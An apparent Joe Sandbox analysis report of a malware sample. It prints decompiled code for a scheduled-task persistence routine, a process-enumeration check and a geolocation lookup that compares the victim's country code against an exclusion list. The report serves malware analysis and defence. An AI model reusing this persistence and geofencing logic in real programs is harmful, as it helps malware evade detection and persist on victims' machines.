																					if(__eflags < 0) {
																						goto L73;
																					} else {
																						_t306 = E0040B140(_t397,  &_v28, __eflags, 0x500078);
																						_v8 = 0xb;
																						_t307 =  *_t306;
																						__eflags = _t307;
																						if(_t307 == 0) {
																							_t500 = 0;
																							__eflags = 0;
																						} else {
																							_t500 =  *_t307;
																						}
																						_t308 = _v60;
																						_t309 =  *((intOrPtr*)( *_t308 + 0x28))(_t308, _t500);
																						_v8 = 1;
																						E0040B1D0( &_v28, _t500);
																						__eflags = _t309;
																						if(_t309 < 0) {
																							goto L73;
																						} else {
																							_t311 = _v40;
																							__eflags =  *((intOrPtr*)( *_t311 + 0x2c))(_t311, _v60);
																							if(__eflags < 0) {
																								goto L73;
																							} else {
																								_t313 = E0040B140(_t397,  &_v28, __eflags, L"Trigger1");
																								_v8 = 0xc;
																								_t314 =  *_t313;
																								__eflags = _t314;
																								if(_t314 == 0) {
																									_t501 = 0;
																									__eflags = 0;
																								} else {
																									_t501 =  *_t314;
																								}
																								_t315 = _v40;
																								_t316 =  *((intOrPtr*)( *_t315 + 0x24))(_t315, _t501);
																								_v8 = 1;
																								E0040B1D0( &_v28, _t501);
																								__eflags = _t316;
																								if(__eflags < 0) {
																									goto L73;
																								} else {
																									_t318 = E0040B140(_t397,  &_v28, __eflags, L"2030-05-02T08:00:00");
																									_v8 = 0xd;
																									_t319 =  *_t318;
																									__eflags = _t319;
																									if(_t319 == 0) {
																										_t502 = 0;
																										__eflags = 0;
																									} else {
																										_t502 =  *_t319;
																									}
																									_t320 = _v40;
																									_t321 =  *((intOrPtr*)( *_t320 + 0x44))(_t320, _t502);
																									_v8 = 1;
																									E0040B1D0( &_v28, _t502);
																									__eflags = _t321;
																									if(__eflags < 0) {
																										goto L73;
																									} else {
																										E00423AAF( &_v28, _t502, __eflags,  &_v92);
																										asm("cdq");
																										_v92 = _v92 + _t517;
																										asm("adc [ebp-0x54], edx"); // executed
																										_t327 = E00423551( &_v92); // executed
																										E004228E0( &_v324, 0x50, "%Y-%m-%dT%H:%M:%S", _t327);
																										_v33 = 0;
																										E00412C40(_t544, _t517,  &_v324);
																										_t332 = E00412900( &_v228, _v33);
																										_t544 = _t544 + 0x18;
																										_v8 = 0xe;
																										__eflags =  *((intOrPtr*)(_t332 + 0x14)) - 8;
																										if(__eflags >= 0) {
																											_t332 =  *_t332;
																										}
																										_t333 = E0040B140(_t397,  &_v28, __eflags, _t332);
																										_v8 = 0xf;
																										_t334 =  *_t333;
																										__eflags = _t334;
																										if(_t334 == 0) {
																											_t504 = 0;
																											__eflags = 0;
																										} else {
																											_t504 =  *_t334;
																										}
																										_t335 = _v40;
																										_t336 =  *((intOrPtr*)( *_t335 + 0x3c))(_t335, _t504);
																										E0040B1D0( &_v28, _t504);
																										_v8 = 1;
																										E00413210( &_v228);
																										_t454 = _v40;
																										 *((intOrPtr*)( *_t454 + 8))(_t454);
																										__eflags = _t336;
																										if(_t336 < 0) {
																											goto L73;
																										} else {
																											_t340 = _v20;
																											_v52 = 0;
																											_t341 =  *((intOrPtr*)( *_t340 + 0x44))(_t340,  &_v52);
																											__eflags = _t341;
																											if(_t341 < 0) {
																												goto L73;
																											} else {
																												_t342 = _v52;
																												_v72 = 0;
																												_t343 =  *((intOrPtr*)( *_t342 + 0x30))(_t342, 0,  &_v72);
																												_t457 = _v52;
																												 *((intOrPtr*)( *_t457 + 8))(_t457);
																												__eflags = _t343;
																												if(_t343 < 0) {
																													goto L73;
																												} else {
																													_t345 = _v72;
																													_v44 = 0;
																													_t346 =  *((intOrPtr*)( *_t345))(_t345, 0x4d511c,  &_v44);
																													_t459 = _v72;
																													 *((intOrPtr*)( *_t459 + 8))(_t459);
																													__eflags = _t346;
																													if(_t346 < 0) {
																														goto L73;
																													} else {
																														__eflags = _v100 - 8;
																														_t349 =  >=  ? _v120 :  &_v120;
																														_t350 = E0040B140(_t397,  &_v28, _v100 - 8,  >=  ? _v120 :  &_v120);
																														_v8 = 0x10;
																														_t511 =  *_t350;
																														__eflags = _t511;
																														if(_t511 == 0) {
																															_t512 = 0;
																															__eflags = 0;
																														} else {
																															_t512 =  *_t511;
																														}
																														_t351 = _v44;
																														_t352 =  *((intOrPtr*)( *_t351 + 0x2c))(_t351, _t512);
																														_v8 = 1;
																														E0040B1D0( &_v28, _t512);
																														__eflags = _t352;
																														if(__eflags >= 0) {
																															_t354 = E0040B140(_t397,  &_v28, __eflags, L"--Task");
																															_v8 = 0x11;
																															_t355 =  *_t354;
																															__eflags = _t355;
																															if(_t355 == 0) {
																																_t513 = 0;
																																__eflags = 0;
																															} else {
																																_t513 =  *_t355;
																															}
																															_t356 = _v44;
																															_t357 =  *((intOrPtr*)( *_t356 + 0x34))(_t356, _t513);
																															_v8 = 1;
																															_t539 = _t357;
																															E0040B1D0( &_v28, _t513);
																															_t466 = _v44;
																															 *((intOrPtr*)( *_t466 + 8))(_t466);
																															__eflags = _t357;
																															if(_t357 < 0) {
																																goto L73;
																															} else {
																																_v96 = 0;
																																E0040B400( &_v172, _t539, _t466);
																																asm("movdqu xmm0, [eax]");
																																asm("movdqu [ebp-0xd8], xmm0");
																																 *_t397( &_v140);
																																asm("movdqu xmm0, [ebp-0x88]");
																																asm("movdqu [ebp-0xc8], xmm0");
																																 *_t397( &_v156);
																																_v8 = 0x14;
																																asm("movdqu xmm0, [ebp-0x98]");
																																asm("movdqu [ebp-0xb8], xmm0");
																																_t365 = E0040B140(_t397,  &_v28, __eflags, L"Time Trigger Task");
																																_v8 = 0x15;
																																_t540 =  *_t365;
																																__eflags = _t540;
																																if(_t540 == 0) {
																																	_t541 = 0;
																																	__eflags = 0;
																																} else {
																																	_t541 =  *_t540;
																																}
																																asm("movdqu xmm0, [ebp-0xd8]");
																																_t469 = _v24;
																																asm("movdqu [eax], xmm0");
																																_t544 = _t544 - 0xfffffffffffffff0;
																																asm("movdqu xmm0, [ebp-0xc8]");
																																asm("movdqu [eax], xmm0");
																																asm("movdqu xmm0, [ebp-0xb8]");
																																asm("movdqu [eax], xmm0");
																																_t542 =  *((intOrPtr*)( *_t469 + 0x44))(_t469, _t541, _v20, 6, 3,  &_v96);
																																E0040B1D0( &_v28,  *_t469);
																																_t398 = __imp__#9;
																																 *_t398( &_v156);
																																 *_t398( &_v140);
																																_v8 = 1;
																																 *_t398( &_v172);
																																__eflags = _t542;
																																if(_t542 >= 0) {
																																	_t378 = _v24;
																																	 *((intOrPtr*)( *_t378 + 8))(_t378);
																																	_t380 = _v20;
																																	 *((intOrPtr*)( *_t380 + 8))(_t380);
																																	_t382 = _v96;
																																	 *((intOrPtr*)( *_t382 + 8))(_t382);
																																	__imp__CoUninitialize(); // executed
																																	_t395 = 1;
																																} else {
																																	swprintf( &_v1348, 0x400, "RegisterTaskDefinition. Err: %X\n", _t542);
																																	_t544 = _t544 + 0x10;
																																	goto L73;
																																}
																															}
																														} else {
																															_t386 = _v44;
																															 *((intOrPtr*)( *_t386 + 8))(_t386);
																															goto L73;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t388 = _v24;
									 *((intOrPtr*)( *_t388 + 8))(_t388);
									__imp__CoUninitialize();
									_t395 = 0;
								}
							} else {
								_t390 = _v32;
								 *((intOrPtr*)( *_t390 + 8))(_t390);
								__imp__CoUninitialize();
								_t395 = 0;
							}
						} else {
							_t392 = _v32;
							 *((intOrPtr*)( *_t392 + 8))(_t392);
							__imp__CoUninitialize();
							_t395 = 0;
						}
					}
					__eflags = _v100 - 8;
					if(_v100 >= 8) {
						L00422587(_v120);
						_t544 = _t544 + 4;
					}
					__eflags = 0;
					_v100 = 7;
					_v104 = 0;
					_v120 = 0;
				} else {
					_t395 = 0;
				}
				if(_a24 >= 8) {
					L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return _t395;
			}

0x0040d24a
0x0040d251
0x0040d258
0x0040d261
0x0040d265
0x0040d26c
0x0040d274
0x0040d28f
0x0040d297
0x0040d2a1
0x0040d2ab
0x0040d2b3
0x0040d2b8
0x0040d2bb
0x0040d2ce
0x0040d2d5
0x0040d2db
0x0040d2dd
0x0040da3c
0x0040da3c
0x0040da42
0x0040d2e3
0x0040d2e3
0x0040d2f0
0x0040d2f2
0x0040d301
0x0040d309
0x0040d30b
0x0040d31a
0x0040d322
0x0040d324
0x0040d333
0x0040d33b
0x0040d33d
0x0040d344
0x0040d34c
0x0040d356
0x0040d35f
0x0040d367
0x0040d36d
0x0040d370
0x0040d378
0x0040d37e
0x0040d387
0x0040d38b
0x0040d397
0x0040d3a4
0x0040d3b1
0x0040d3bd
0x0040d3c2
0x0040d3c8
0x0040d3ca
0x0040d3ea
0x0040d3f1
0x0040d3f6
0x0040d3fa
0x0040d3fc
0x0040d3fe
0x0040d404
0x0040d404
0x0040d400
0x0040d400
0x0040d400
0x0040d406
0x0040d411
0x0040d417
0x0040d41d
0x0040d422
0x0040d424
0x0040d444
0x0040d449
0x0040d44d
0x0040d44f
0x0040d451
0x0040d457
0x0040d457
0x0040d453
0x0040d453
0x0040d453
0x0040d459
0x0040d462
0x0040d468
0x0040d46c
0x0040d471
0x0040d478
0x0040d484
0x0040d487
0x0040d48f
0x0040d492
0x0040d494
0x0040d4ac
0x0040d4b2
0x0040d4c0
0x0040d4c2
0x0040da2a
0x0040da2a
0x0040da30
0x0040da33
0x0040da39
0x00000000
0x0040d4c8
0x0040d4d0
0x0040d4d5
0x0040d4d9
0x0040d4db
0x0040d4dd
0x0040d4e3
0x0040d4e3
0x0040d4df
0x0040d4df
0x0040d4df
0x0040d4e5
0x0040d4ec
0x0040d4f2
0x0040d4f8
0x0040d4fd
0x0040d503
0x0040d506
0x0040d508
0x00000000
0x0040d50e
0x0040d50e
0x0040d514
0x0040d51f
0x0040d522
0x0040d524
0x00000000
0x0040d52a
0x0040d52a
0x0040d532
0x0040d535
0x0040d53d
0x0040d540
0x0040d542
0x00000000
0x0040d548
0x0040d548
0x0040d54e
0x0040d559
0x0040d55c
0x0040d55e
0x00000000
0x0040d564
0x0040d564
0x0040d56c
0x0040d56f
0x0040d577
0x0040d57a
0x0040d57c
0x00000000
0x0040d582
0x0040d582
0x0040d588
0x0040d599
0x0040d59b
0x00000000
0x0040d5a1
0x0040d5a9
0x0040d5ae
0x0040d5b2
0x0040d5b4
0x0040d5b6
0x0040d5bc
0x0040d5bc
0x0040d5b8
0x0040d5b8
0x0040d5b8
0x0040d5be
0x0040d5c5
0x0040d5cb
0x0040d5d1
0x0040d5d6
0x0040d5dc
0x0040d5df
0x0040d5e1
0x00000000
0x0040d5e7
0x0040d5e7
0x0040d5ed
0x0040d5f8
0x0040d5fb
0x0040d5fd
0x00000000
0x0040d603
0x0040d603
0x0040d60a
0x0040d616
0x0040d619
0x0040d621
0x0040d624
0x0040d626
0x00000000
0x0040d62c
0x0040d62c
0x0040d633
0x0040d642
0x0040d644
0x0040d64c
0x0040d64f
0x0040d651
0x00000000
0x0040d657
0x0040d657
0x0040d664
0x0040d666
0x00000000
0x0040d66c
0x0040d674
0x0040d679
0x0040d67d
0x0040d67f
0x0040d681
0x0040d687
0x0040d687
0x0040d683
0x0040d683
0x0040d683
0x0040d689
0x0040d690
0x0040d696
0x0040d69c
0x0040d6a1
0x0040d6a3
0x00000000
0x0040d6a9
0x0040d6b1
0x0040d6b6
0x0040d6ba
0x0040d6bc
0x0040d6be
0x0040d6c4
0x0040d6c4
0x0040d6c0
0x0040d6c0
0x0040d6c0
0x0040d6c6
0x0040d6cd
0x0040d6d3
0x0040d6d9
0x0040d6de
0x0040d6e0
0x00000000
0x0040d6e6
0x0040d6e6
0x0040d6f2
0x0040d6f4
0x00000000
0x0040d6fa
0x0040d702
0x0040d707
0x0040d70b
0x0040d70d
0x0040d70f
0x0040d715
0x0040d715
0x0040d711
0x0040d711
0x0040d711
0x0040d717
0x0040d71e
0x0040d724
0x0040d72a
0x0040d72f
0x0040d731
0x00000000
0x0040d737
0x0040d73f
0x0040d744
0x0040d748
0x0040d74a
0x0040d74c
0x0040d752
0x0040d752
0x0040d74e
0x0040d74e
0x0040d74e
0x0040d754
0x0040d75b
0x0040d761
0x0040d767
0x0040d76c
0x0040d76e
0x00000000
0x0040d774
0x0040d778
0x0040d77f
0x0040d780
0x0040d787
0x0040d78a
0x0040d79e
0x0040d7a9
0x0040d7b0
0x0040d7be
0x0040d7c3
0x0040d7c6
0x0040d7ca
0x0040d7ce
0x0040d7d0
0x0040d7d0
0x0040d7d6
0x0040d7db
0x0040d7df
0x0040d7e1
0x0040d7e3
0x0040d7e9
0x0040d7e9
0x0040d7e5
0x0040d7e5
0x0040d7e5
0x0040d7eb
0x0040d7f2
0x0040d7fa
0x0040d805
0x0040d809
0x0040d80e
0x0040d814
0x0040d817
0x0040d819
0x00000000
0x0040d81f
0x0040d81f
0x0040d825
0x0040d830
0x0040d833
0x0040d835
0x00000000
0x0040d83b
0x0040d83b
0x0040d842
0x0040d84e
0x0040d851
0x0040d859
0x0040d85c
0x0040d85e
0x00000000
0x0040d864
0x0040d864
0x0040d86b
0x0040d87a
0x0040d87c
0x0040d884
0x0040d887
0x0040d889
0x00000000
0x0040d88f
0x0040d88f
0x0040d899
0x0040d89e
0x0040d8a3
0x0040d8a7
0x0040d8a9
0x0040d8ab
0x0040d8b1
0x0040d8b1
0x0040d8ad
0x0040d8ad
0x0040d8ad
0x0040d8b3
0x0040d8ba
0x0040d8c0
0x0040d8c6
0x0040d8cb
0x0040d8cd
0x0040d8e5
0x0040d8ea
0x0040d8ee
0x0040d8f0
0x0040d8f2
0x0040d8f8
0x0040d8f8
0x0040d8f4
0x0040d8f4
0x0040d8f4
0x0040d8fa
0x0040d901
0x0040d907
0x0040d90b
0x0040d90d
0x0040d912
0x0040d918
0x0040d91b
0x0040d91d
0x00000000
0x0040d923
0x0040d92a
0x0040d931
0x0040d936
0x0040d941
0x0040d949
0x0040d94b
0x0040d95a
0x0040d962
0x0040d964
0x0040d96b
0x0040d978
0x0040d980
0x0040d985
0x0040d989
0x0040d98b
0x0040d98d
0x0040d993
0x0040d993
0x0040d98f
0x0040d98f
0x0040d98f
0x0040d995
0x0040d99d
0x0040d9b0
0x0040d9b6
0x0040d9b9
0x0040d9c1
0x0040d9c7
0x0040d9d4
0x0040d9e0
0x0040d9e2
0x0040d9e7
0x0040d9f4
0x0040d9fd
0x0040da05
0x0040da0a
0x0040da0c
0x0040da0e
0x0040da46
0x0040da4c
0x0040da4f
0x0040da55
0x0040da58
0x0040da5e
0x0040da61
0x0040da67
0x0040da10
0x0040da22
0x0040da27
0x00000000
0x0040da27
0x0040da0e
0x0040d8cf
0x0040d8cf
0x0040d8d5
0x00000000
0x0040d8d5
0x0040d8cd
0x0040d889
0x0040d85e
0x0040d835
0x0040d819
0x0040d76e
0x0040d731
0x0040d6f4
0x0040d6e0
0x0040d6a3
0x0040d666
0x0040d651
0x0040d626
0x0040d5fd
0x0040d5e1
0x0040d59b
0x0040d57c
0x0040d55e
0x0040d542
0x0040d524
0x0040d508
0x0040d496
0x0040d496
0x0040d49c
0x0040d49f
0x0040d4a5
0x0040d4a5
0x0040d426
0x0040d426
0x0040d42c
0x0040d42f
0x0040d435
0x0040d435
0x0040d3cc
0x0040d3cc
0x0040d3d2
0x0040d3d5
0x0040d3db
0x0040d3db
0x0040d3ca
0x0040da69
0x0040da6d
0x0040da72
0x0040da77
0x0040da77
0x0040da7a
0x0040da7c
0x0040da83
0x0040da8a
0x0040d276
0x0040d276
0x0040d276
0x0040da92
0x0040da97
0x0040da9c
0x0040daa6
0x0040dab1

APIs

CoInitialize.OLE32(00000000), ref: 0040D26C
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
VariantInit.OLEAUT32(?), ref: 0040D2F0
VariantInit.OLEAUT32(?), ref: 0040D309
VariantInit.OLEAUT32(?), ref: 0040D322
VariantInit.OLEAUT32(?), ref: 0040D33B
VariantClear.OLEAUT32(?), ref: 0040D397
VariantClear.OLEAUT32(?), ref: 0040D3A4
VariantClear.OLEAUT32(?), ref: 0040D3B1
VariantClear.OLEAUT32(?), ref: 0040D3C2
CoUninitialize.OLE32 ref: 0040D3D5

Strings

Time Trigger Task, xrefs: 0040D43C, 0040D973
--Task, xrefs: 0040D8DD
Trigger1, xrefs: 0040D6FA
RegisterTaskDefinition. Err: %X, xrefs: 0040DA11
Author Name, xrefs: 0040D4C8
2030-05-02T08:00:00, xrefs: 0040D737
%Y-%m-%dT%H:%M:%S, xrefs: 0040D790
PT5M, xrefs: 0040D5A1, 0040D66C

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
API String ID: 2496729271-1738591096
Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00412220() {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				unsigned int _v20;
				unsigned int _v24;
				WCHAR* _v28;
				int _v32;
				char _v36;
				char _v2084;
				char _v43044;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t37;
				void* _t38;
				unsigned int _t40;
				void* _t50;
				struct HINSTANCE__* _t52;
				int _t56;
				signed int _t61;
				struct HINSTANCE__* _t62;
				void* _t63;
				struct HINSTANCE__* _t64;
				void* _t65;
				void* _t66;

				E0042F7C0(0xa820);
				_t56 = 0;
				_v32 = 0;
				_v28 = PathFindFileNameW( *(CommandLineToArgvW(GetCommandLineW(),  &_v32)));
				_t62 = LoadLibraryW(L"kernel32.dll");
				_v8 = GetProcAddress(_t62, "EnumProcesses");
				_v12 = GetProcAddress(_t62, "EnumProcessModules");
				_v16 = GetProcAddress(_t62, "GetModuleBaseNameW");
				_t37 = _v8;
				if(_t37 == 0) {
					_t52 = LoadLibraryW(L"Psapi.dll"); // executed
					_t64 = _t52;
					_v8 = GetProcAddress(_t64, "EnumProcesses");
					_v12 = GetProcAddress(_t64, "EnumProcessModules");
					_v16 = GetProcAddress(_t64, "GetModuleBaseNameW");
					_t37 = _v8;
				}
				_t38 =  *_t37( &_v43044, 0xa000,  &_v20); // executed
				if(_t38 != 0) {
					_t61 = 0;
					_t40 = _v20 >> 2;
					_v24 = _t40;
					if(_t40 != 0) {
						do {
							_t63 = OpenProcess(0x410, 0,  *(_t65 + _t61 * 4 - 0xa820));
							if(_t63 != 0) {
								_push( &_v36);
								_push(4);
								_push( &_v8);
								_push(_t63); // executed
								if(_v12() != 0) {
									_v16(_t63, _v8,  &_v2084, 0x400);
									_t50 = E00420235(_t56, _t61, _t63,  &_v2084, _v28);
									_t66 = _t66 + 8;
									if(_t50 == 0) {
										_t56 = _t56 + 1;
									}
								}
							}
							CloseHandle(_t63);
							_t61 = _t61 + 1;
						} while (_t61 < _v24);
					}
					return _t56;
				} else {
					return 1;
				}
			}

0x00412228
0x0041222f
0x00412232
0x00412253
0x00412262
0x00412272
0x0041227d
0x00412282
0x00412285
0x0041228a
0x00412291
0x00412297
0x004122a7
0x004122b2
0x004122b7
0x004122ba
0x004122ba
0x004122cd
0x004122d1
0x004122e2
0x004122e4
0x004122e7
0x004122ec
0x004122f0
0x00412304
0x00412308
0x0041230d
0x0041230e
0x00412313
0x00412314
0x0041231a
0x0041232c
0x00412339
0x0041233e
0x00412343
0x00412345
0x00412345
0x00412343
0x0041231a
0x00412347
0x0041234d
0x0041234e
0x004122f0
0x0041235b
0x004122d5
0x004122de
0x004122de

APIs

GetCommandLineW.KERNEL32 ref: 00412235
CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
CloseHandle.KERNEL32(00000000), ref: 00412347

Strings

Psapi.dll, xrefs: 0041228C
GetModuleBaseNameW, xrefs: 00412277, 004122AC
kernel32.dll, xrefs: 0041224E
EnumProcesses, xrefs: 00412264, 00412299
EnumProcessModules, xrefs: 0041226C, 004122A1

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
API String ID: 3668891214-3807497772
Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0040CF10() {
				WCHAR* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				WCHAR* _v24;
				char _v40;
				intOrPtr _v44;
				WCHAR* _v48;
				char _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				char _v88;
				intOrPtr _v92;
				WCHAR* _v96;
				char _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				long _v156;
				char _v10395;
				void _v10396;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t90;
				void* _t95;
				intOrPtr _t102;
				intOrPtr _t119;
				signed int _t122;
				void* _t128;
				WCHAR* _t129;
				WCHAR* _t131;
				intOrPtr* _t134;
				void* _t135;
				void* _t142;
				void* _t146;
				intOrPtr* _t147;
				void* _t149;
				signed int _t151;
				void* _t152;
				void* _t153;
				intOrPtr* _t157;
				void* _t158;
				void* _t159;
				intOrPtr _t160;
				void* _t161;

				_push(0xffffffff);
				_push(0x4ca850);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t160;
				E0042F7C0(0x2890);
				_push(_t128);
				_push(_t152);
				_v10396 = 0;
				E0042B420( &_v10395, 0, 0x27ff);
				_t161 = _t160 + 0xc;
				_t90 = InternetOpenW(L"Microsoft Internet Explorer", 0, 0, 0, 0); // executed
				_t149 = _t90;
				_v92 = 7;
				_push(0x1b);
				_v96 = 0;
				_v112 = 0;
				E00415C10(_t128,  &_v112, _t149, _t152, L"https://api.2ip.ua/geo.json");
				_v8 = 0;
				_t94 =  >=  ? _v112 :  &_v112;
				_t95 = InternetOpenUrlW(_t149,  >=  ? _v112 :  &_v112, 0, 0, 0, 0); // executed
				_t153 = _t95;
				if(_t153 != 0) {
					InternetReadFile(_t153,  &_v10396, 0x2800,  &_v156); // executed
					InternetCloseHandle(_t153);
					InternetCloseHandle(_t149);
					_push(0x10);
					_v44 = 0xf;
					_v48 = 0;
					_v64 = 0;
					E004156D0(_t128,  &_v64, _t149, "\"country_code\":\"");
					_v8 = 1;
					_v20 = 0xf;
					_v24 = 0;
					_v40 = 0;
					if(_v10396 != 0) {
						_t134 =  &_v10396;
						_t23 = _t134 + 1; // 0x1
						_t146 = _t23;
						do {
							_t102 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t102 != 0);
						_t135 = _t134 - _t146;
					} else {
						_t135 = 0;
					}
					_push(_t135);
					E004156D0(_t128,  &_v40, _t149,  &_v10396);
					_v8 = 2;
					_t106 =  >=  ? _v64 :  &_v64;
					if(E00414300( &_v40,  >=  ? _v64 :  &_v64, 0, _v48) == 0xffffffff) {
						L30:
						_t129 = 0;
					} else {
						_t156 = E00413010( &_v40,  &_v136, _t107 + _v48, 0xa);
						if( &_v40 != _t114) {
							if(_v20 >= 0x10) {
								L00422587(_v40);
								_t161 = _t161 + 4;
							}
							_v20 = 0xf;
							_v24 = 0;
							_v40 = 0;
							E00413D40( &_v40, _t156);
						}
						if(_v116 >= 0x10) {
							L00422587(_v136);
							_t161 = _t161 + 4;
						}
						if(E00414300( &_v40, "\"", 0, 1) == 0xffffffff) {
							goto L30;
						} else {
							E00413010( &_v40,  &_v88, 0, _t116);
							_t131 = _v72;
							_t151 = 0;
							_v152 = "RU";
							_v148 = "BY";
							_v144 = "UA";
							_v140 = "AZ";
							_v136 = "AM";
							_v132 = "TJ";
							_v128 = "KZ";
							_v124 = "KG";
							_v120 = "UZ";
							_v116 = "SY";
							do {
								_t147 =  *((intOrPtr*)(_t159 + _t151 * 4 - 0x94));
								if( *_t147 != 0) {
									_t157 = _t147;
									_t61 = _t157 + 1; // 0x500005
									_t142 = _t61;
									do {
										_t119 =  *_t157;
										_t157 = _t157 + 1;
									} while (_t119 != 0);
									_t158 = _t157 - _t142;
								} else {
									_t158 = 0;
								}
								_t144 =  >=  ? _v88 :  &_v88;
								_t121 =  <  ? _t131 : _t158;
								_t122 = E0040B650( >=  ? _v88 :  &_v88, _t147,  <  ? _t131 : _t158);
								_t161 = _t161 + 4;
								if(_t122 != 0 || _t131 < _t158 || (_t122 & 0xffffff00 | _t131 != _t158) != 0) {
									goto L24;
								} else {
									_t129 = 1;
								}
								L26:
								if(_v68 >= 0x10) {
									L00422587(_v88);
									_t161 = _t161 + 4;
								}
								_v68 = 0xf;
								_v72 = 0;
								_v88 = 0;
								goto L31;
								L24:
								_t151 = _t151 + 1;
							} while (_t151 < 9);
							_t129 = 0;
							goto L26;
						}
					}
					L31:
					if(_v20 >= 0x10) {
						L00422587(_v40);
						_t161 = _t161 + 4;
					}
					_v20 = 0xf;
					_v24 = 0;
					_v40 = 0;
					if(_v44 >= 0x10) {
						L00422587(_v64);
						_t161 = _t161 + 4;
					}
					_v44 = 0xf;
					_v48 = 0;
					_v64 = 0;
				} else {
					_t129 = 0;
				}
				if(_v92 >= 8) {
					L00422587(_v112);
				}
				 *[fs:0x0] = _v16;
				return _t129;
			}

0x0040cf19
0x0040cf1b
0x0040cf20
0x0040cf26
0x0040cf2d
0x0040cf32
0x0040cf33
0x0040cf40
0x0040cf4a
0x0040cf4f
0x0040cf5f
0x0040cf65
0x0040cf67
0x0040cf6e
0x0040cf72
0x0040cf81
0x0040cf85
0x0040cf8e
0x0040cf9e
0x0040cfa6
0x0040cfac
0x0040cfb0
0x0040cfcd
0x0040cfda
0x0040cfdd
0x0040cfdf
0x0040cfe9
0x0040cff0
0x0040cff7
0x0040cffb
0x0040d000
0x0040d00b
0x0040d012
0x0040d019
0x0040d01d
0x0040d023
0x0040d029
0x0040d029
0x0040d030
0x0040d030
0x0040d032
0x0040d033
0x0040d037
0x0040d01f
0x0040d01f
0x0040d01f
0x0040d039
0x0040d044
0x0040d049
0x0040d05c
0x0040d069
0x0040d1cb
0x0040d1cb
0x0040d06f
0x0040d084
0x0040d08b
0x0040d091
0x0040d096
0x0040d09b
0x0040d09b
0x0040d0a2
0x0040d0a9
0x0040d0b0
0x0040d0b4
0x0040d0b4
0x0040d0bd
0x0040d0c5
0x0040d0ca
0x0040d0ca
0x0040d0e1
0x00000000
0x0040d0e7
0x0040d0f1
